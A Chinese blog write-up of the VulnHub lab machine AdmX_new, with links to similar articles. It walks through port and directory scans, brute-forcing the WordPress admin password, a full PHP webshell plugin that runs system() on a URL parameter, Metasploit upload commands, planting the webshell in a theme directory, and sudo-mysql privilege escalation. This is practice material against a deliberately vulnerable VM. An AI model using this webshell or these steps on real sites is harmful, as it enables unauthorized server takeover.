靶机-AdmX_new

最新推荐文章于 2024-04-12 22:08:20 发布
最新推荐文章于 2024-04-12 22:08:20 发布
阅读量250 收藏 1
点赞数
分类专栏: 靶机 文章标签: 网络 java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_58602402/article/details/131248384
版权

AdmX_new

环境搭建

靶场地址:
https://download.vulnhub.com/admx/AdmX_new.7z
kali攻击机ip:192.168.12.144
靶机ip:192.168.12.171

一、信息收集

1.主机发现,发现靶机ip:192.168.12.171

arp-scan -l

在这里插入图片描述
2.对靶机ip进行端口扫描,只开放一个80端口

 nmap -sS -sV -T4 192.168.12.171 -p-

在这里插入图片描述
3.访问80端口
在这里插入图片描述

二、漏洞挖掘

1.对目标站点进行目录扫描,发现wordpress目录

dirsearch -u "http://192.168.12.171/"

在这里插入图片描述
2.对目录进行访问查看

在这里插入图片描述
在这里插入图片描述
发现页面访问缓慢,F12进行查看,发现对ip192.168.159.145进行请求,没有这个ip
在这里插入图片描述
利用bp将这个ip进行替换成靶机IP,到Proxy下的Options下的Match and Replace,先把里面的所有内容Remove掉。再点击Add
在这里插入图片描述
在这里插入图片描述

3.利用wordpress的工具进行扫描

wpscan --url http://192.168.12.171/wordpress

在这里插入图片描述
4.利用工具直接对wordpress后台密码进行爆破,admin/adam14

wpscan --url http://192.168.12.171/wordpress/ -P ./User_Pwds.txt -U admin

在这里插入图片描述
5.访问登录页面进行登录admin/adam14

在这里插入图片描述

三、漏洞利用

1.wordpress后台漏洞利用,写个php的插件,WordPress需要压缩成zip格式

<?php /** * Plugin Name: Webshell * Plugin URI: https://zhangd.github.io * Description: WP Webshell for Pentest * Version: 1.0 * Author: ZhangD * Author URI: https://zhangd.github.io * License: https://zhangd.github.io */ if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>

2.上传文件,下载失败

在这里插入图片描述
3.利用msf进行获取shell

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.12.171
set username admin
set password adam14
set targeturi /wordpress
run

在这里插入图片描述
4.进入shell
在这里插入图片描述
5.切换到bash下,之后将木马写入到网站的目录之下

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd /var/www/html/wordpress/wp-content/themes/twentytwentyone

echo '<?php /** * Plugin Name: Webshell * Plugin URI: https://zhangd.github.io * Description: WP Webshell for Pentest * Version: 1.0 * Author: ZhangD * Author URI: https://zhangd.github.io * License: https://zhangd.github.io */ if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>' > 11.php

在这里插入图片描述
6.再网页进行访问
在这里插入图片描述

四、提权

1.查看wordpress的配置文件,发现账户和密码

目录:/var/www/html/wordpress
账户和密码:admin/Wp_Admin#123

cat wp-config.php

在这里插入图片描述
2.尝试登陆数据库失败,尝试直接切换用户wpadmin/adam14进行登陆
在这里插入图片描述
3.尝试sudo提权

在这里插入图片描述
4.登录数据库,密码:adam14,通过mysql的system指令执行系统命令

sudo /usr/bin/mysql -u root -D wordpress -p

在这里插入图片描述

AdmX_new靶机
weixin_45691672的博客
06-16 911
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
AdmX_new打靶记录
wwd180的博客
06-16 203
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
AdmX_new靶场
zjxxxy的博客
06-15 284
vulnhub靶场AdmX_new攻略
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2580
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1521
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 817
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
t6AdmX_new靶机
08-03
t6AdmX_new靶机
VulnHub靶机-easy_cloudantivirus 打靶
最新发布
网络空间安全学习
04-12 1047
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
t6AdmX_new靶机:全方位安全探测与WordPress漏洞挖掘
t6AdmX_new靶机是一款专业的网络安全工具,主要用于系统安全评估、漏洞探测和渗透测试。它通过一系列功能模块帮助用户深入了解目标网络环境。 首先,t6AdmX_new具有主机存活判断功能,能够快速识别并确认目标主机...
vulnhub靶机--AdmX_new
weixin_46107179的博客
04-08 4035
靶机下载地址:靶机下载 主机发现 通过nmap扫描得到主机IP地址 信息搜集 通过nmap对IP地址扫描,得到信息,只有80端口 然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url 于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip 需要通过burpsuite里面的proxy模块的options功能,将其响应头
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 737
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
Vulnhun_ADMX: 1.0.1
qq_45434762的博客
05-16 450
主机信息kali: 192.168.254.135 ADMX:: 192.168.254.159 信息收集通过nmap扫描目标主机发现只开放了80端口nmap -T4 -p- -A -v...
Damn Vulnerable Web Application (DVWA) 在线演练靶机地址
热门推荐
Ambulong的博客
06-04 1万+
https://www.vulnspy.com/?u=dvwa/damn_vulnerable_web_application_(dvwa)Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for securit...
【安全狐】靶机渗透_bulldog(附下载靶机地址)
安全狐
12-23 3873
目录 渗透测试の信息收集 一、主机发现 二、端口扫描(masscan/nmap) 三、端口服务 四、扫描子域名 五、渗透ing 六、反弹shell,提权 总结 靶机下载地址: 链接:https://pan.baidu.com/s/1UrPkBqoM-AshTiKOZCPRww 提取码:aqhu 渗透测试の信息收集 ( ip 系统信息 端口号 端口对应的服务 服务对应版本 子域名 whois c段 旁站等 ) 一、主机发现 方法1 nmap -sn 192.168.1...
DC-7靶场
mlws1900的博客
03-27 1222
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
找不到靶机IP怎么办,教你几步就会了
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
[渗透测试学习靶机01] vulnhub靶场 The Planets: Earth
weixin_47112073的博客
10-10 2987
渗透测试学习,vulnhub靶场练习Earth靶机
DC4-靶机
Au
08-25 3654
下载地址 配置的环境: kali:192.168.25.131 DC4 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.134,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.2...
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 928
快速打通靶机
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值